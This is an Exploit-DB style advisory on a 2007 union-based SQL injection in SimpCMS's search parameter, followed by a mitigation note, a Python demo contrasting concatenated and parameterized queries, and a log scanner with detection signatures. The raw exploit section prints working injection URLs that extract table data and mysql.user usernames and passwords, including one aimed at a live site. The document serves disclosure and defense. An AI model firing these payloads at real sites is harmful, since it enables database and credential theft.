Vendor: SimpCMS
By: ú Cold z3ro
N/A
CVSS: HIGH
Title: Remote SQL Injection
CWE: 89
Product Name: SimpCMS
Affected Version From: All versions
Affected Version To: All versions
Patch Exists: NO
Related CWE:
CPE: a:simpcms:simpcms
Metasploit:
Other Scripts:
Platforms Tested:
Year: 2007

SimpCMS <= all Remote SQL Injection Vulnerability

SimpCMS is vulnerable to remote SQL injection through the 'keyword' parameter of its search page (index.php?site=search). The parameter is placed into the database query without escaping, so a crafted value can close the string literal and append a UNION SELECT over another table; the rows of that table are then returned in place of search results. Because the injection is union-based, data from arbitrary tables the database user can read (the advisory names categories, news and the mysql system tables) can be pulled out. The queries the advisory reports are listed in the exploit section below.

Mitigation:

To mitigate the vulnerability, the vendor should validate user input and, above all, pass the search keyword to the database as a bound parameter of a prepared statement rather than concatenating it into the SQL text, so that quotes, UNION and comment sequences in the value are treated as data. Users are advised to update to the latest version of SimpCMS that includes patches for this vulnerability; note that the metadata above records no known patch.
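The following is an added example, not SimpCMS code: a constructed SQLite database with a seven-column news table (so that the advisory's seven-value UNION lines up) and a categories table, a hypothetical search query built by string concatenation the way the advisory implies, and the same query hardened with a bound parameter. The advisory's own 'keyword' payload is replayed against both. SQLite stands in for MySQL; it treats the `/**/` padding as whitespace and the trailing `/*` as a comment running to the end of the statement, so the payload can be replayed unchanged. The table and column names, the shape of the search query and the sample rows are all assumptions made for the example; the real SimpCMS query is not known from the advisory, and the leading `1)` in the payload is simply part of the literal here.

```python
import sqlite3

# Value of the 'keyword' parameter from the advisory above (URL-decoded).
# In a concatenated query, everything after the final "/*" is commented out.
ADVISORY_PAYLOAD = "1)'/**/union/**/select/**/0,1,2,3,name,5,6/**/from/**/categories/*"


def build_db():
    """Constructed sample schema (hypothetical, not SimpCMS's): a 7-column news
    table the search runs over, and a categories table the injection targets."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE news(id INTEGER, title TEXT, body TEXT, author TEXT,
                          created TEXT, views INTEGER, published INTEGER);
        INSERT INTO news VALUES (1, 'Release notes', 'text', 'admin', '2007-09-01', 10, 1);
        INSERT INTO news VALUES (2, 'Site relaunch', 'text', 'editor', '2007-09-10', 3, 1);
        CREATE TABLE categories(id INTEGER, name TEXT);
        INSERT INTO categories VALUES (1, 'internal-only');
        INSERT INTO categories VALUES (2, 'public');
    """)
    return con


def search_vulnerable(con, keyword):
    """Search as the advisory implies it: the keyword is spliced into the SQL
    text, so a quote in it ends the literal and UNION/comments are parsed as SQL."""
    sql = ("SELECT id, title, body, author, created, views, published FROM news "
           "WHERE title LIKE '%" + keyword + "%'")
    return con.execute(sql).fetchall()


def search_safe(con, keyword):
    """Hardened form: the keyword travels as a bound parameter and is only ever
    compared as data; the LIKE wildcards are added to the value, not to the SQL."""
    sql = ("SELECT id, title, body, author, created, views, published FROM news "
           "WHERE title LIKE ?")
    return con.execute(sql, ("%" + keyword + "%",)).fetchall()


def leaked_values(rows, column_index=4):
    """Column 4 is where the payload's 'name' lands (0,1,2,3,name,5,6)."""
    return [row[column_index] for row in rows]


def demo():
    con = build_db()
    vuln = search_vulnerable(con, ADVISORY_PAYLOAD)   # categories.name leaks
    safe = search_safe(con, ADVISORY_PAYLOAD)         # payload is inert text
    benign = search_safe(con, "relaunch")             # ordinary search still works
    return {
        "vulnerable_leaks": leaked_values(vuln),
        "safe_rows": len(safe),
        "benign_rows": len(benign),
    }


if __name__ == "__main__":
    print(demo())
```

Against the concatenated query the UNION returns the two category names in the fifth column of the "search results"; with the bound parameter the identical value matches no title and returns nothing, while a normal keyword still finds its row. Escaping alone would not be equivalent: the parameterized form never re-parses the value as SQL at all.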
Source (Exploit-DB raw data):

SimpCMS <= all Remote SQL Injection Vulnerability


Found By : ú Cold z3ro , http://www.hackteach.org/


Script : http://www.simpcms.com/


====================================

Exploit :

/index.php?site=search&keyword=1)'/**/union/**/select/**/0,1,2,3,name,5,6/**/from/**/categories/*

OR

/index.php?site=search

in search area insert your query

$query = 1)'/**/union/**/select/**/0,1,2,3,$COLUMN,5,6/**/from/**/$TABLE/*

$TABLE = "categories" OR "news" OR "mysql.user" OR "mysql.db" OR 
"information_schema.tables"

$COLUMN = "name" OR "id" OR "username" OR "password"

Examples :

/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\

1 ) From $TABLE categories :

/index.php?site=search&keyword=1)'/**/union/**/select/**/0,1,2,3,name,5,6/**/from/**/categories/*

/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\

2 ) From $TABLE news :

/index.php?site=search&keyword=1)'/**/union/**/select/**/0,1,2,3,id,5,6/**/from/**/news/*

/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\

3 ) From $TABLE mysql.user :

/index.php?site=search&keyword=1)'/**/union/**/select/**/0,1,2,3,username,5,6/**/from/**/mysql.user/*
/index.php?site=search&keyword=1)'/**/union/**/select/**/0,1,2,3,password,5,6/**/from/**/mysql.user/*

/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\

====================================

Live Example :

http://www.simpcms.com/medium/normal/index.php?site=search&keyword=1)'/**/union/**/select/**/0,user(),database(),3,name,5,6/**/from/**/categories/*

# milw0rm.com [2007-09-16]
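A defender-side counterpart, added here and not part of the advisory: a small access-log scanner that normalizes each query-string value the way the database engine will eventually see it (URL-decoding until stable, turning `/**/` into whitespace, collapsing spaces, lowercasing) before matching, so the comment padding used throughout the exploit section does not split "union select" and hide it from a plain string match. The log lines, the signature names and the regular expressions are constructed for the example; the third and fourth lines carry request URLs taken from the advisory above.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Constructed access-log lines (abbreviated common log format). Lines 3 and 4
# carry the advisory's own requests, the fourth one fully percent-encoded.
SAMPLE_LOG = [
    '10.0.0.5 - - [16/Sep/2007:10:01:02 +0000] "GET /index.php?site=search&keyword=relaunch HTTP/1.1" 200 1843',
    '10.0.0.5 - - [16/Sep/2007:10:01:09 +0000] "GET /index.php?site=news&id=2 HTTP/1.1" 200 2210',
    '10.0.0.9 - - [16/Sep/2007:10:02:31 +0000] "GET /index.php?site=search&keyword=1)%27/**/union/**/select/**/0,1,2,3,name,5,6/**/from/**/categories/* HTTP/1.1" 200 1990',
    '10.0.0.9 - - [16/Sep/2007:10:02:40 +0000] "GET /index.php?site=search&keyword=1)%27%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0,1,2,3,password,5,6%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmysql.user%2F%2A HTTP/1.1" 200 1990',
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

# Signatures (constructed for this example) are applied to the *normalized*
# value, so "/**/union/**/select" and "union select" look the same to them.
SIGNATURES = {
    "union_select": re.compile(r"\bunion\b.{0,40}\bselect\b"),
    "mysql_system_table": re.compile(r"\b(?:mysql\.user|mysql\.db|information_schema\.)"),
    "trailing_comment": re.compile(r"/\*\s*$"),
}


def normalize(value):
    """Decode until stable (catches double-encoding), replace /*...*/ comments
    with a space, collapse whitespace and lowercase."""
    prev = None
    while value != prev:
        prev, value = value, unquote_plus(value)
    value = re.sub(r"/\*.*?\*/", " ", value)
    return re.sub(r"\s+", " ", value).strip().lower()


def inspect_request(path):
    """Return the sorted signature names triggered by any query parameter."""
    hits = set()
    query = urlsplit(path).query
    for _name, values in parse_qs(query, keep_blank_values=True).items():
        for raw in values:
            norm = normalize(raw)
            hits.update(sig for sig, pat in SIGNATURES.items() if pat.search(norm))
    return sorted(hits)


def scan_log(lines):
    """Return (client_ip, request_path, hits) for every line with a hit."""
    findings = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        hits = inspect_request(m.group(1))
        if hits:
            findings.append((line.split(" ", 1)[0], m.group(1), hits))
    return findings


if __name__ == "__main__":
    for ip, path, hits in scan_log(SAMPLE_LOG):
        print(ip, hits, path[:60])
```

Run over the sample, only the two requests from 10.0.0.9 are flagged, the second one additionally for touching a mysql system table; the ordinary search and the news page pass. Normalizing before matching is the point: a filter that looks for the literal string "union select" in the raw URL sees neither of the advisory's requests. Such a tripwire is for detection and triage only; on a search feature it will occasionally fire on legitimate text, and it does not replace the parameterized query.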